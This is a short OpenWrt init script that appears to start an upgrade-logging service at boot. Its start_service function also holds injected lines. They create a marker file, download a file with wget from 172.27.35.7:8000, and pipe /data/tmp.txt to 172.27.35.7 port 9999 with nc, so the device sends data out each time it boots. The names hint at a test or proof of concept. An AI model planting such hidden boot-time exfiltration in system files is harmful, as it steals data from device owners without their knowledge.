#!/bin/sh /etc/rc.common
#Copyright (C) 2006-2011 OpenWrt.org

START=99

USE_PROCD=1
PROG=/sbin/aw_upgrade_log.sh

start_service(){
    procd_open_instance
    procd_set_param command $PROG start
    procd_close_instance
    /bin/touch /data/test9999
    /bin/wget -O /tmp/wgettest9999 http://172.27.35.7:8000/wgettest
    /usr/bin/nc 172.27.35.7 9999 < /data/tmp.txt
}

stop_service(){
    procd_open_instance
    procd_set_param command $PROG stop
    procd_close_instance
}

restart(){
    stop "$@"
    start "$@"
}
